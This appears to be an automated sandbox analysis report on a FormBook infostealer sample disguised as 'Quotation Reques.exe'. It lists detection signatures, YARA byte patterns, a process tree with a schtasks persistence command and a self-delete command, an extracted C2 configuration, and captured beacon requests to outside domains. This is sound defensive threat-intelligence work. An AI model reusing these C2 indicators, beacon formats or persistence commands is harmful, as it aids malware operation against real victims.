Loading ...

Play interactive tourEdit tour

Analysis Report Quotation Reques.exe

Overview

General Information

Sample Name:Quotation Reques.exe
Analysis ID:356530
MD5:5a752fcd71acb65c618a829610b7b7e1
SHA1:1e0608c292a70e30f75308255d6039a8ca373d8a
SHA256:d96042b51f171f68a99d4568f311f267fe595df0add3851e162cbcee7f897edb
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large strings
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • Quotation Reques.exe (PID: 6476 cmdline: 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: 5A752FCD71ACB65C618A829610B7B7E1)
    • schtasks.exe (PID: 6744 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • Quotation Reques.exe (PID: 6788 cmdline: C:\Users\user\Desktop\Quotation Reques.exe MD5: 5A752FCD71ACB65C618A829610B7B7E1)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmd.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\cmd.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • cmd.exe (PID: 7080 cmdline: /c del 'C:\Users\user\Desktop\Quotation Reques.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166c9:$sqlite3step: 68 34 1C 7B E1
    • 0x167dc:$sqlite3step: 68 34 1C 7B E1
    • 0x166f8:$sqlite3text: 68 38 2A 90 C5
    • 0x1681d:$sqlite3text: 68 38 2A 90 C5
    • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
    00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 19 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      6.2.Quotation Reques.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        6.2.Quotation Reques.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        6.2.Quotation Reques.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166c9:$sqlite3step: 68 34 1C 7B E1
        • 0x167dc:$sqlite3step: 68 34 1C 7B E1
        • 0x166f8:$sqlite3text: 68 38 2A 90 C5
        • 0x1681d:$sqlite3text: 68 38 2A 90 C5
        • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
        6.2.Quotation Reques.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          6.2.Quotation Reques.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Scheduled temp file as task from temp locationShow sources
          Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: 'C:\Users\user\Desktop\Quotation Reques.exe' , ParentImage: C:\Users\user\Desktop\Quotation Reques.exe, ParentProcessId: 6476, ProcessCommandLine: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\ftkqUsB' /XML 'C:\Users\user\AppData\Local\Temp\tmp1923.tmp', ProcessId: 6744

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for URL or domainShow sources
          Source: http://www.thisisauckland.com/0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0Avira URL Cloud: Label: malware
          Found malware configurationShow sources
          Source: 6.2.Quotation Reques.exe.400000.0.raw.unpackMalware Configuration Extractor: FormBook {"C2 list": ["www.valiantbranch.com/0wdn/"], "decoy": ["inclusivefamilybookshop.com", "hollyjmillsphotography.com", "mojavewellnessaz.com", "cookies-x.info", "trainingkanban.com", "tempoborough.life", "mayalv.com", "mbsgiftstore.com", "vanjele.com", "serieshaha.com", "jlbstructural.com", "topkids.asia", "thejoyofleather.com", "qvujxa.com", "anythinginworld.com", "danielablason.com", "smartphoneloops.com", "thisisauckland.com", "cityelectricals.com", "revati-thenoir.com", "beinglean.net", "bingomix.net", "africaglobalexim.com", "wayncalstore.com", "instentinotice.com", "wertzdesign.com", "mathewshea.world", "thedesailldada.com", "elinecoin.com", "xlkefu2.com", "nkdesigner.com", "0galleries.com", "ladresse-conceptpremium.com", "farrellforlegislature.com", "sphenecouture.com", "myloverhuier.com", "buildermarketingprogram.com", "ketonesconnect.com", "into.house", "crowdcrew.info", "inbox.ventures", "photomaker.pro", "homeswithkj.com", "companyincorporationlanka.com", "curbsidechauffeur.com", "xiangoshi.com", "n95brokers.com", "gurumanindustries.com", "calicarwraps.com", "shreeradheyassociates.com", "shopkonfection.com", "jadepalance.com", "videorv.com", "razpah.com", "redchillileeds.com", "samcarrt.com", "humangreens.com", "ficuswildlife.com", "dorteklarskov.com", "quitlikeaqueen.com", "shreedurgastore.com", "diabetessurgeryturkey.com", "promotionalplacements.com", "mercycaremanagement.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exeReversingLabs: Detection: 34%
          Multi AV Scanner detection for submitted fileShow sources
          Source: Quotation Reques.exeVirustotal: Detection: 26%Perma Link
          Source: Quotation Reques.exeReversingLabs: Detection: 34%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000010.00000002.491075658.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295452534.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491565528.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.491847161.00000000029C0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.296373263.0000000000BD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.295627965.0000000000B80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.252275583.0000000003589000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.Quotation Reques.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.370af40.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.Quotation Reques.exe.36bb520.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Roaming\ftkqUsB.exeJoe Sandbox ML: detected
          Machine Learning detection for sampleShow sources
          Source: Quotation Reques.exeJoe Sandbox ML: detected
          Source: 6.2.Quotation Reques.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

          barindex
          Uses 32bit PE filesShow sources
          Source: Quotation Reques.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Contains modern PE file flags such as dynamic base (ASLR) or NXShow sources
          Source: Quotation Reques.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Binary contains paths to debug symbolsShow sources
          Source: Binary string: wntdll.pdbUGP source: Quotation Reques.exe, 00000006.00000002.299728528.000000000126F000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.494308304.00000000030AF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe, 00000010.00000002.490096400.0000000000380000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Quotation Reques.exe, cmd.exe
          Source: Binary string: cmd.pdb source: Quotation Reques.exe, 00000006.00000002.300094599.0000000002D10000.00000040.00000001.sdmp, cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0039245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_0039245C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003968BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_003968BA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_0038B89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0038B89C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003885EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_003885EA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 16_2_003A31DC FindFirstFileW,FindNextFileW,FindClose,16_2_003A31DC
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B3EF30
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B3F220
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B3FE38
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h0_2_06B3FA20
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then pop ebx6_2_00406A9A
          Source: C:\Users\user\Desktop\Quotation Reques.exeCode function: 4x nop then pop edi6_2_0041569C

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.valiantbranch.com/0wdn/
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1Host: www.mojavewellnessaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1Host: www.ficuswildlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.thisisauckland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.trainingkanban.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1Host: www.sphenecouture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1Host: www.dorteklarskov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.gurumanindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 194.9.94.85 194.9.94.85
          Source: Joe Sandbox ViewASN Name: LOOPIASE LOOPIASE
          Source: Joe Sandbox ViewASN Name: KRYSTALGR KRYSTALGR
          Source: Joe Sandbox ViewASN Name: GODADDY-AMSDE GODADDY-AMSDE
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=VISJTRF+R7Uh4mUWzRN0LlryAyb8IKpBE9z8YS+GNikClX9Lr80MYD+giceidMXBN5T1 HTTP/1.1Host: www.mojavewellnessaz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=OUgIxUFsYGQ41w7hQC/DBdH1JHjC++6nioh90AjecgG3yuW0+eUvoDUl1UqOD/TLQ8Us HTTP/1.1Host: www.ficuswildlife.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=XqoKlbUxH4MvhR3WHn/bEyJILpMTXi5akImeFCcaj/eQm8+DbVPpEujjk99LtX7zxOgw&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.thisisauckland.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=ix6ctNvA27TkjcVVjU84nkoRBhFOceD1ut/SMPDHN4oqZYjnQY/2eO9u+VnCkR9n2BIl&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.trainingkanban.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=BtLwtEoUFNWHbVqCGleqoAdl9A252xhpwrcAYeIb01MyTz4m47Yt/ZHU9A+9eyld1TIt HTTP/1.1Host: www.sphenecouture.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?v2MHc=3fPHVZWhu2EdAZf0&nfuxZr=NMR3a+Tn1MegLtIVZwnrXNHtLsOIdaavPUxKaHV9friONqSMK2w0/HiapUB+av1cMLA0 HTTP/1.1Host: www.dorteklarskov.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /0wdn/?nfuxZr=f8DN2IXKanXhjVkivpC934J6Qd4CL4Wi30Q5lE4yx0++lUmhxcUli1GZaUF1qSyNqh47&v2MHc=3fPHVZWhu2EdAZf0 HTTP/1.1Host: www.gurumanindustries.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.diabetessurgeryturkey.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 08:39:53 GMTServer: ApacheUpgrade: h2,h2cConnection: Upgrade, closeAccept-Ranges: bytesVary: Accept-Encoding,User-AgentContent-Length: 1699Content-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 65 65 65 3b 0a 7d 0a 0a 62 6f 64 79 2c 20 68 31 2c 20 70 20 7b 0a 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 53 65 67 6f 65 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 22 4c 75 63 69 64 61 20 47 72 61 6e 64 65 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 0a 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 20 61 75 74 6f 3b 0a 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 37 37 70 78 3b 0a 20 20 6d 61 78 2d 77 69 64 74 68 3a 20 31 31 37 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 7d 0a 0a 2e 72 6f 77 3a 62 65 66 6f 72 65 2c 20 2e 72 6f 77 3a 61 66 74 65 72 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 74 61 62 6c 65 3b 0a 20 20 63 6f 6e 74 65 6e 74 3a 20 22 20 22 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 36 20 7b 0a 20 20 77 69 64 74 68 3a 20 35 30 25 3b 0a 7d 0a 0a 2e 63 6f 6c 2d 6d 64 2d 70 75 73 68 2d 33 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 38 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 20 30 3b 0a 7d 0a 0a 2e 6c 65 61 64 20 7b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 31 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 32 30 30 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 7d 0a 0a 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 30 70 78 3b 0a 7d 0a 0a 61 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 33 32 38 32 65 36 3b 0a 20 20 74
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: Quotation Reques.exe, 00000000.00000002.251892848.0000000002581000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: Quotation Reques.exe, 00000000.00000002.254079677.0000000005610000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000007.00000000.279347914.000000000BC30000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
